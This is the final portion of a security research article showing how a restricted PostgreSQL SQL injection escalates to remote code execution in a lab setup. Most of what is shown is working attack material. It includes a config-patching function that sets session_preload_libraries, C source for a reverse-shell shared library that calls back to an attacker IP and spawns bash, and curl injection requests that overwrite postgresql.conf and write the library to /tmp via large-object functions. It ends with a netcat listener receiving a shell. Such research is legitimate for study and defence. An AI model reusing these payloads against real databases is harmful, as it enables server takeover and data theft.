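overriding commented-out defaults where present:

```python
def patch_conf(conf: str, lib="payload.so", libdir="/tmp:$libdir") -> str:
    """Set session_preload_libraries and dynamic_library_path in a
    postgresql.conf dump, replacing commented-out defaults too."""
    out = []
    for line in conf.splitlines():
        # '#session_preload_libraries = ...' -> 'session_preload...'
        key = line.lstrip("#").strip()
        if key.startswith("session_preload_libraries"):
            line = "session_preload_libraries = '%s'" % lib
        elif key.startswith("dynamic_library_path"):
            line = "dynamic_library_path = '%s'" % libdir
        out.append(line)
    return "\n".join(out) + "\n"
```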
---[ 4.2 - Compiling the malicious library

One of the final steps is to compile a malicious library for the server
to load. The code will naturally vary depending on the OS the DBMS is
running on. For the Unix-like case, let's compile the following simple
reverse shell into an .so file. The "_init()" function will
automatically fire on library load:
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#include "postgres.h"
#include "fmgr.h"

#ifdef PG_MODULE_MAGIC
PG_MODULE_MAGIC;
#endif

void _init() {
    /*
        code taken from https://www.revshells.com/
    */
    int port = 8888;
    struct sockaddr_in revsockaddr;

    int sockt = socket(AF_INET, SOCK_STREAM, 0);
    revsockaddr.sin_family = AF_INET;
    revsockaddr.sin_port = htons(port);
    revsockaddr.sin_addr.s_addr = inet_addr("172.23.16.1");

    connect(sockt, (struct sockaddr *) &revsockaddr,
            sizeof(revsockaddr));
    dup2(sockt, 0);
    dup2(sockt, 1);
    dup2(sockt, 2);

    char * const argv[] = {"/bin/bash", NULL};
    execve("/bin/bash", argv, NULL);
}
Notice the presence of the "PG_MODULE_MAGIC" field in the code. It is
required for the library to be recognized and loaded by the PostgreSQL
server.

Before compilation, we must install the proper PostgreSQL development
packages for the correct major version, 13 in our case:
$ sudo apt install postgresql-13 postgresql-server-dev-13 -y
The code can be compiled with gcc with the following command:
$ gcc \
-I$(pg_config --includedir-server) \
-shared \
-fPIC \
-nostartfiles \
-o payload.so \
payload.c
---[ 4.3 - Uploading the config and library to the server

With the updated config file and the compiled library in our hands, it
is time to upload and overwrite everything on the target DBMS host.

Uploading and replacing the postgresql.conf file:
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,CAST((SELECT lo_from_bytea(3331333337, decode('$(base64 -w 0 postgresql_new.conf)', 'base64'))) AS text)"
[
{"id":1337,"text":"3331333337"}
]
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,CAST((SELECT lo_export(3331333337, '/etc/postgresql/13/main/postgresql.conf')) AS text)"
[{"id":1337,"text":"1"}]
Uploading the malicious .so file:
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,CAST((SELECT lo_from_bytea(33313333337, decode('$(base64 -w 0 payload.so)', 'base64'))) AS text)"
[
{"id":1337,"text":"33313333337"}
]
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,CAST((SELECT lo_export(33313333337, '/tmp/payload.so')) AS text)"
[{"id":1337,"text":"1"}]
If everything is correct, we should see the updated config and .so file in place:
# .so library
=== target server ===
ubuntu@ubuntu-virtual-machine:/tmp$ md5sum payload.so
0a240596d100c8ca8e781543884da202 payload.so
=== attacker server ===
$ md5sum payload.so
0a240596d100c8ca8e781543884da202 payload.so
# postgresql.conf
=== target server ===
ubuntu@ubuntu-virtual-machine:~$ md5sum /etc/postgresql/13/main/postgresql.conf
480bb646f178be2a9a2b609b384e20de /etc/postgresql/13/main/postgresql.conf
=== attacker server ===
$ md5sum postgresql_new.conf
480bb646f178be2a9a2b609b384e20de postgresql_new.conf
---[ 4.4 - Reload successful

We are all set. Now for the moment of glory! A quick config reload, and
we get a reverse shell back from the server.
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, CAST((SELECT pg_reload_conf()) AS text)"
[
{"id":1337,"text":"true"}
]
On the attacker host:
$ nc -lvnp 8888
Listening on 0.0.0.0 8888
Connection received on 172.23.16.1 53004
id
uid=129(postgres) gid=138(postgres) groups=138(postgres),115(ssl-cert)
pwd
/var/lib/postgresql
--[ 5 - Conclusions

In this article, we managed to escalate the impact of a seemingly very
restricted SQL injection to a critical level by recreating DELETE and
UPDATE statements from scratch via direct modification of the DBMS
files and data, and developed a novel technique for escalating user
permissions!

Excessive server file read/write permissions can be a powerful tool in
the wrong hands. There is still much to discover with this attack
vector, but I hope you've learned something useful today.

Cheers,
adeadfed

--[ 6 - References
[0] https://github.com/gin-gonic/gin
[1] https://github.com/jackc/pgx
[2] https://github.com/jackc/pgx/issues/1090
[3] backend/tcop/postgres.c#L1468
[4] https://www.postgresql.org/docs/current/lo-funcs.html
[5] https://pulsesecurity.co.nz/articles/postgres-sqli
[6] postgres-sql-injection-to-rce-with-archive-command
[7] https://www.postgresql.org/docs/9.4/functions-admin.html
[8] https://www.postgresql.org/docs/current/storage-hot.html
[9] https://www.postgresql.org/docs/current/storage-page-layout.html
[10] https://github.com/adeadfed/postgresql-filenode-editor
[11] https://postgresqlco.nf/doc/en/param/session_preload_libraries/
[12] https://www.manniwood.com/2020_12_21/read_pg_from_go.html
--[ 7 - Source code
|=[ EOF ]=---------------------------------------------------------------=|